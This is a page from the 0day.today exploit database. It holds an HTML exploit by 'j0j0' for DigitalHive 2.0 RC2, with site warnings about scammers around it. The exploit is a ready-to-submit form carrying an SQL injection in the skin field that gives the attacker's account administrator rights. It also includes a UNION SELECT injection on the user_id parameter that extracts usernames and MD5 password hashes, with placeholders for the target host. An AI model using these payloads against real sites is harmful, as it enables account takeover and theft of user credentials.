0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
DigitalHive <= 2.0 RC2 (user_id) Remote SQL Injection Exploit
============================================================= DigitalHive <= 2.0 RC2 (user_id) Remote SQL Injection Exploit ============================================================= <!-- Hive v2.0 RC2 Remote SQL Injection c0ded by j0j0 --> <html> <head> <style type="text/css"> body { margin:3%; font-size:10px; color:#FFFFFF; font-family:Verdana,Arial; background-color:#1a1a1a; text-align: center; } input { background:#303030; color:#FFFFFF; font-family:Verdana,Arial; font-size:10px; vertical-align:middle; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d; padding: 3px; margin: 2px; } input[type=text] { width: 200px; } textarea { background:#303030; color:#FFFFFF; font-family:Verdana,Arial; font-size:10px; vertical-align:middle; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212; } table td { font-size: 10px; font-family: Verdana, Arial; } h3 { color: #CC0000; } a { color: #999999; text-decoration: none; font-weight: bold; } #exploit { font-family: Courier New, sans-ms; font-size: 12px; color: #00FF00; width: 400px; text-align: left; } </style> </head> <body> <center> <h3>Hive v2.0 RC2 Remote SQL Injection<br /><br />-= c0ded by j0j0 =-</h3> <br /> <p>you must first create an account, and log in.<br /> then you can send exploit<br /> <span style="color:#cc0000;">don't forget to change the action="" URL of this form</span></p> <p>&nbps;</p> <table width="600px" cellspacing="1"> <tr> <td width="20%" class="td5_2">Username</td> <td class="td5_1"><input type="text" name="id" value="admin" /></td> <td>you will use this username to login</td> </tr> <tr> <td class="td5_2">Password</td> <td class="td5_1"><input type="text" name="password" value="admin" /></td> <td>you will use this password to login</td> </tr> <tr> <td class="td5_2">Mail</td> <td class="td5_1"><input type="text" class="texte" name="mail" size="24" value="You_Were_H4ck3d@microsoft.com" /></td> <td>email doesn't have importance</td> </tr> <tr> <td class="td5_2">SQL Injection</td> <td colspan="3" class="td5_1"> <input name="selectskin" type="text" value="purpletech', niveau_num=4 WHERE num=2 /*"/> </td> </tr> </table> <p>purpletech', niveau_num=4 WHERE num=2 /* <-- niveau_num is for admin access / num is the member id (default admin id is 2)<br /></p> <br> <input type="submit" name="submitButtonName" value="Attack"> <p>&nbps;</p> <p>Now you are admin, logout and re-login with new username/password</p> <p>There is another one injection : <div style="max-width:500px;"> http://{HOST}/{PATH}/base.php?page=gestion_membre.php&var=profil&user_id=-9999999'/**/UNION/**/SELECT/**/ 0,concat(nick,char(58),pass),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/FROM/**/_user/**/WHERE<br />/**/{SQL_PREFIX}_user.num={MEMBER_ID}/**//*<br /> </div> <br /><br /> Change {HOST}, {PATH}, {SQL_PREFIX} and {MEMBER_ID}<br /> then look at the "Pseudonyme" field, you've got LOGIN:MD5_PASSWORD)</p> <!-- Hidden inputs --> <input type="hidden" class="texte" name="nom" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="prenom" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="age" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="icq" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="adresse" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="msn" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="aim" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="hobbie" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="yahoo" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="site" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="text" size="24" value="h4ck3d" > <input type="hidden" class="texte" name="selectlangue" size="24" value="h4ck3d" > <input type="hidden" value="false" name="online" > </form> </center> </body> </html> # 0day.today [2024-10-06] #